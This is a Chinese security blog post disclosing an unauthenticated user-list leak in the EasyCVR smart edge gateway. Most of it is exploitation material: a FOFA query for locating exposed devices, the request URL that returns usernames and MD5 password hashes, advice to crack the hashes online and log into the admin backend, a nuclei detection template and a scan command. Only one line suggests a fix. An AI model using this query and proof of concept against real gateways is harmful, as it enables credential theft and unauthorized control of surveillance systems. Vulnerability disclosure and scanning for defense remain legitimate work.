【1day】EasyCVR智能边缘网关用户信息泄漏漏洞(附POC)

admin 2024年3月4日10:37:38评论41 views字数 1001阅读3分20秒阅读模式

使

01

漏洞名称

EasyCVR智能边缘网关 userlist 信息泄漏漏洞

02

漏洞影响

全版本

【1day】EasyCVR智能边缘网关用户信息泄漏漏洞(附POC)

03

漏洞描述

EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。

04

资产FOFA搜索语句
title="EasyCVR"

05

漏洞复现

poc如下

/api/v1/userlist?pageindex=0&pagesize=10

直接使用浏览器访问该接口即可看到敏感信息

【1day】EasyCVR智能边缘网关用户信息泄漏漏洞(附POC)

Username字段为用户名,
Password字段为密码的MD5值,在线解密即可直接登陆后台

【1day】EasyCVR智能边缘网关用户信息泄漏漏洞(附POC)

06

nuclei poc

id: easycvr-userlist-disclosureinfo:  name: EasyCVR智能边缘网关userlist信息泄漏漏洞  author: fgz  severity: high  reference:    - none  metadata:    fofa-query: title="EasyCVR"    veified: true  tags: EasyCVRhttp:  - method: GET    path:      - "{{BaseURL}}/api/v1/userlist?pageindex=0&pagesize=10"    matchers-condition: and    matchers:      - type: status        status:          - 200      - type: word        part: body        words:          - 'ID'          - 'Username'          - 'Password'        condition: and

公众号复制代码可能格式有问题,nuclei poc 已上传网盘,后台回复0007免费获取

单个目标扫描

.nuclei.exe -t .easycvr-userlist-disclosure.yaml -u http://x.x.x.x:18000/ -me ttt

【1day】EasyCVR智能边缘网关用户信息泄漏漏洞(附POC)

07

修复建议

限制该接口访问权限

08

关注我们

原文始发于微信公众号(AI与网安):【1day】EasyCVR智能边缘网关用户信息泄漏漏洞(附POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月4日10:37:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【1day】EasyCVR智能边缘网关用户信息泄漏漏洞(附POC)https://cn-sec.com/archives/2099014.html

发表评论

匿名网友 填写信息